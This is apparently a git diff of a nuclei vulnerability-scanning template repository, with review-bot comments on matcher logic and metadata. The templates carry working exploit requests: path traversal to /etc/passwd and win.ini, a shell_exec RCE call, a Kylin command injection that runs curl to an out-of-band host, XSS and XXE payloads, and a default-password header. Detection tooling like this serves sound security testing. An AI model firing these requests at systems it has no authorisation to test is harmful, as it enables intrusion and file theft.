https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.50 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2020-15050 - tags: cve,cve2020,lfi,suprema,biostar2 + cwe-id: CWE-22 + epss-score: 0.55214 + epss-percentile: 0.97597 + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: supremainc + product: biostar_2 + tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc -requests: +http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" @@ -28,3 +41,4 @@ requests: - "fonts" - "extensions" condition: and +# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
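Review bot: The rewritten description in the `@@ -1,21 +1,34 @@` hunk is ungrammatical, `allows remote attackers can read arbitrary files`; I would write `description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers to read arbitrary files from the server via local file inclusion.` The new `metadata:` block gives `max-request`, `vendor` and `product` but no `verified:` key, unlike the other templates updated in this commit, so the template's verification status is left unstated. The CVSS vector change to `C:H/I:N/A:N` is consistent with the 7.5 score and with a confidentiality-only file read.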
diff --git a/nuclei-templates/CVE-2020/CVE-2020-15129.yaml b/nuclei-templates/CVE-2020/cve-2020-15129.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15129.yaml rename to nuclei-templates/CVE-2020/cve-2020-15129.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15227.yaml b/nuclei-templates/CVE-2020/cve-2020-15227.yaml new file mode 100644 index 0000000000..e483393043 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15227.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-15227 + +info: + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 + +requests: + - method: GET + path: + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-15505.yaml b/nuclei-templates/CVE-2020/cve-2020-15505.yaml new file mode 100644 index 0000000000..3672a1f449 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15505.yaml 
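Review bot: The new file is named `cve-2020-15227.yaml` while its `id:` is `CVE-2020-15227`, so id and file name differ in case; this commit renames other files in both directions (`cve-2020-7048.yaml` → `CVE-2020-7048.yaml` above, `CVE-2020-13927.yaml` → `cve-2020-13927.yaml` below), so one convention should be chosen and applied to the new files too. The template also carries `cvss-score: 9.80` and no `metadata:` block, whereas templates modified elsewhere in this commit use the `9.8` form and declare `max-request`.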
@@ -0,0 +1,42 @@ +id: CVE-2020-15505 + +info: + name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 + author: dwisiswant0 + severity: critical + description: | + A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. + # THIS TEMPLATE IS ONLY FOR DETECTING + # To carry out further attacks, please see reference[2] below. + # This template works by passing a Hessian header, otherwise; + # it will return a 403 or 500 internal server error. Reference[3]. + reference: + - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html + - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 + - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 + - https://github.com/orangetw/JNDI-Injection-Bypass + tags: cve,cve2020,mobileiron,rce,sentry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 + +requests: + - raw: + - | + POST /mifs/.;/services/LogService HTTP/1.1 + Host: {{Hostname}} + Referer: https://{{Hostname}} + Content-Type: x-application/hessian + Connection: close + + {{hex_decode('630200480004')}} + matchers-condition: and + matchers: + - type: word + words: + - "application/x-hessian" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15920.yaml b/nuclei-templates/CVE-2020/cve-2020-15920.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-15920.yaml rename to nuclei-templates/CVE-2020/cve-2020-15920.yaml 
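Review bot: The new template's `classification:` block has `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, unlike the other new files in this commit (`cve-2020-15227.yaml` gives `CWE-74`, `cve-2020-19282.yaml` gives `CWE-79`). The comments inside `info:` point readers to `reference[2]` and `Reference[3]` by position, which silently break if the list is reordered; naming the link instead (`see the iamnoooob/CVE-Reverse write-up`) is more robust. There is also no `metadata:`/`max-request` entry.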
diff --git a/nuclei-templates/CVE-2020/CVE-2020-16846.yaml b/nuclei-templates/CVE-2020/cve-2020-16846.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-16846.yaml rename to nuclei-templates/CVE-2020/cve-2020-16846.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-18268.yaml b/nuclei-templates/CVE-2020/cve-2020-18268.yaml deleted file mode 100644 index 033c62e51b..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-18268.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-18268 - -info: - name: Z-BlogPHP 1.5.2 Open redirect - author: 0x_Akoko - severity: medium - description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." - reference: - - https://github.com/zblogcn/zblogphp/issues/216 - - https://www.cvedetails.com/cve/CVE-2020-18268 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-18268 - cwe-id: CWE-601 - tags: cve,cve2020,redirect,zblogphp,authenticated - -requests: - - raw: - - | - POST /zb_system/cmd.php?act=verify HTTP/1.1 - Host: {{Hostname}} - Content-Length: 81 - Content-Type: application/x-www-form-urlencoded - Connection: close - - btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 - - - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2020/cve-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml new file mode 100644 index 0000000000..729970b1ac --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-19282.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2020-19282 + +info: + name: Jeesns 1.4.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. + reference: + - https://github.com/zchuanzhao/jeesns/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + tags: cve,cve2020,jeesns,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-19282 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-19283.yaml b/nuclei-templates/CVE-2020/cve-2020-19283.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-19283.yaml rename to nuclei-templates/CVE-2020/cve-2020-19283.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1956.yaml b/nuclei-templates/CVE-2020/cve-2020-1956.yaml new file mode 100644 index 0000000000..55b1c1bc92 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-1956.yaml 
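Review bot: The body word matcher in this new template reads `- ''` here; if that is the actual file content, an empty word matches every body, so `matchers-condition: and` reduces to status 200 plus `text/html` and every reachable `/error` page would be reported as vulnerable. It is likely that the reflected script string was lost when this page was rendered, so please confirm the committed file carries the reflected payload as the matched word. Unlike the other new files in this commit, the `matchers:` list also starts with an empty line, which is harmless but inconsistent.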
@@ -0,0 +1,60 @@ +id: CVE-2020-1956 + +info: + name: Apache Kylin 3.0.1 - Command Injection Vulnerability + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server. + remediation: | + Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor. + reference: + - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/ + - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706 + - https://nvd.nist.gov/vuln/detail/CVE-2020-1956 + - http://www.openwall.com/lists/oss-security/2020/07/14/1 + - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-1956 + cwe-id: CWE-78 + epss-score: 0.97374 + epss-percentile: 0.99898 + cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: apache + product: kylin + shodan-query: http.favicon.hash:-186961397 + tags: cve,cve2020,apache,kylin,rce,oast,kev +variables: + username: "{{username}}:" + password: "{{password}}" + +http: + - raw: + - | + POST /kylin/api/user/authentication HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('{{username}}:' + '{{password}}')}} + - | + POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + 
part: interactsh_protocol + words: + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" +# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-19625.yaml b/nuclei-templates/CVE-2020/cve-2020-19625.yaml deleted file mode 100644 index 38ef466c86..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-19625.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: cve-2020-19625 -info: - name: Gridx 1.3 RCE - author: geeknik - description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. - reference: https://github.com/oria/gridx/issues/433 - severity: high - tags: cve,cve2020,gridx,rce -requests: - - method: GET - path: - - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - extractors: - - type: regex - part: body - group: 1 - regex: - - '
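Review bot: In the new cve-2020-1956 template the `variables` block defines `username` as `"{{username}}:"` with a trailing colon, while the Authorization header then builds `base64('{{username}}:' + '{{password}}')`, so if the template variable is what the header expands the encoded credential becomes `user::password` and the authentication request fails. Either drop the colon from the variable, `username: "{{username}}"`, or drop the literal `':'` from the header expression, but not both. The variable is also defined in terms of `{{username}}` itself, which presumably relies on the CLI-supplied value being resolved first; a one-line comment stating that would make the intent checkable.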

PHP Version ([0-9.]+)<\/h1>' diff --git a/nuclei-templates/CVE-2020/cve-2020-20988.yaml b/nuclei-templates/CVE-2020/cve-2020-20988.yaml deleted file mode 100644 index 011eebb4ef..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-20988.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2020-20988 - -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. - reference: - - https://mycvee.blogspot.com/p/xss2.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-20988 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2020-20988 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2020,domainmod,xss,authenticated - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /reporting/domains/cost-by-owner.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - cookie-reuse: true - req-condition: true - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - - 'contains(body_2, "value=\"\"/>")' - - 'contains(body_2, "DomainMOD")' - condition: and - -# Enhanced by mp on 2022/08/14 diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/cve-2020-2103.yaml new file mode 100644 index 0000000000..5adba642ed --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-2103.yaml 
@@ -0,0 +1,67 @@ +id: CVE-2020-2103 + +info: + name: Jenkins <=2.218 - Information Disclosure + author: c-sh0 + severity: medium + description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server. + remediation: | + Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. + reference: + - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 + - http://www.openwall.com/lists/oss-security/2020/01/29/1 + - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 + - https://access.redhat.com/errata/RHBA-2020:0402 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-2103 + cwe-id: CWE-200 + epss-score: 0.00534 + epss-percentile: 0.76681 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + metadata: + max-request: 2 + vendor: jenkins + product: jenkins + shodan-query: http.favicon.hash:81586312 + tags: cve,cve2020,jenkins + +http: + - raw: + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + - | + GET {{BaseURL}}/whoAmI/ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'text/html' + - 'x-jenkins' + case-insensitive: true + condition: and + + - type: word + part: body_2 + words: + - 'Cookie' + - 'SessionId: null' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - x_jenkins +# digest: 
490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-22209.yaml b/nuclei-templates/CVE-2020/cve-2020-22209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-22209.yaml rename to nuclei-templates/CVE-2020/cve-2020-22209.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-22840.yaml b/nuclei-templates/CVE-2020/cve-2020-22840.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-22840.yaml rename to nuclei-templates/CVE-2020/cve-2020-22840.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-23015.yaml b/nuclei-templates/CVE-2020/cve-2020-23015.yaml new file mode 100644 index 0000000000..ffed6c574a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-23015.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-23015 + +info: + name: OPNsense 20.1.5. Open Redirect + author: 0x_Akoko + severity: medium + description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website. + reference: + - https://github.com/opnsense/core/issues/4061 + - https://www.cvedetails.com/cve/CVE-2020-23015 + tags: cve,cve2020,redirect,opnsense + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23015 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/?url=http://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-23517.yaml b/nuclei-templates/CVE-2020/cve-2020-23517.yaml new file mode 100644 index 0000000000..ddd98b74b9 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-23517.yaml 
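Review bot: The `body_2` matcher in the new cve-2020-2103 template requires the literal `SessionId: null`, which reads as the state in which the whoAmI page does not expose a session identifier; if the intent is to detect the disclosure the description talks about, this condition looks inverted and would match hardened instances while missing exposed ones. A short comment explaining why the second, identical `GET /whoAmI/` request is needed and why `null` is the expected value would remove the doubt. As a style point, these raw requests use an absolute target (`GET {{BaseURL}}/whoAmI/ HTTP/1.1`) while every other raw request in this diff uses a path target with `Host: {{Hostname}}`; `GET /whoAmI/ HTTP/1.1` would be consistent.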
@@ -0,0 +1,29 @@ +id: CVE-2020-23517 + +info: + name: Aryanic HighMail (High CMS) XSS + author: geeknik + severity: medium + description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html + tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/login/?uid=\">" + + matchers-condition: and + matchers: + - type: word + words: + - text/html + part: header + - type: word + words: + - "%25xxe%3b]> + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "Failed to install the generic artifact type" diff --git a/nuclei-templates/CVE-2020/CVE-2020-25223.yaml b/nuclei-templates/CVE-2020/cve-2020-25223.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-25223.yaml rename to nuclei-templates/CVE-2020/cve-2020-25223.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-2551.yaml b/nuclei-templates/CVE-2020/cve-2020-2551.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-2551.yaml rename to nuclei-templates/CVE-2020/cve-2020-2551.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-26073.yaml b/nuclei-templates/CVE-2020/cve-2020-26073.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-26073.yaml rename to nuclei-templates/CVE-2020/cve-2020-26073.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-26876.yaml b/nuclei-templates/CVE-2020/cve-2020-26876.yaml index 2fdc04789f..6559ee1788 100644 --- a/nuclei-templates/CVE-2020/cve-2020-26876.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-26876.yaml 
@@ -1,41 +1,32 @@ id: CVE-2020-26876 - info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - - https://plugins.trac.wordpress.org/changeset/2388997 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 cve-id: CVE-2020-26876 - cwe-id: CWE-306 - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb - requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - matchers-condition: and matchers: - type: regex - part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - + part: body - type: word - part: header words: - "application/json" - + part: header - type: status status: - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-28351.yaml b/nuclei-templates/CVE-2020/cve-2020-28351.yaml new file mode 100644 index 0000000000..62ede841c5 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-28351.yaml 
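Review bot: The hunk drops `matchers-condition: and` from cve-2020-26876 without replacing it, and as far as I recall nuclei treats an absent `matchers-condition` as `or`, so after this change a bare 200 or any `application/json` response at `/wp-json/wp/v2/lesson/1` satisfies the template and unaffected sites get reported. The line should be kept: `matchers-condition: and`. The same hunk also replaces `tags: cve,cve2020,wordpress,wp-plugin,exposure,edb` with `tags: wordpress,plugin` and removes the CVSS metrics and score, the CWE id and the vendor changeset reference, which looks like a regression rather than a cleanup; the other modified templates in this diff (cve-2020-8644, cve-2020-8772) add such metadata instead of removing it.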
@@ -0,0 +1,36 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + tags: cve,cve2020,shoretel,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/cve-2020-35338.yaml new file mode 100644 index 0000000000..205fad22a0 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35338.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2020-35338 + +info: + author: Jeya Seelan + severity: critical + name: Default Credentials of WMT Server + description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 + - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa + tags: cve,cve2020,wmt,default-login + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 +requests: + - method: GET + path: + - "{{BaseURL}}/server/" + headers: + Authorization: "Basic OnBva29u" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WMT Server playout" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35713.yaml b/nuclei-templates/CVE-2020/cve-2020-35713.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-35713.yaml rename to nuclei-templates/CVE-2020/cve-2020-35713.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35749.yaml b/nuclei-templates/CVE-2020/cve-2020-35749.yaml new file mode 100644 index 0000000000..1145fee9cb --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35749.yaml 
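Review bot: The Authorization header in the new cve-2020-35338 template carries a pre-encoded blob (`Authorization: "Basic OnBva29u"`), so a reader has to decode it to see which credential is tried; since the description already names the default password and other templates in this diff use the `base64()` helper, `Authorization: "Basic {{base64(':pokon')}}"` states the same thing legibly and makes the empty username explicit. The template also has no `metadata`/`max-request` block and no digest line, unlike the other templates added in this diff (cve-2020-1956, cve-2020-2103, cve-2020-35749), and the blank line between `tags` and `classification` inside `info` is inconsistent with the rest of the file.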
@@ -0,0 +1,55 @@ +id: CVE-2020-35749 + +info: + name: WordPress Simple Job Board <2.9.4 - Local File Inclusion + author: cckuailong + severity: high + description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. + remediation: | + Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability. + reference: + - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d + - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 + - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing + - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2020-35749 + cwe-id: CWE-22 + epss-score: 0.02144 + epss-percentile: 0.88116 + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: presstigers + product: simple_board_job + framework: wordpress + tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - 
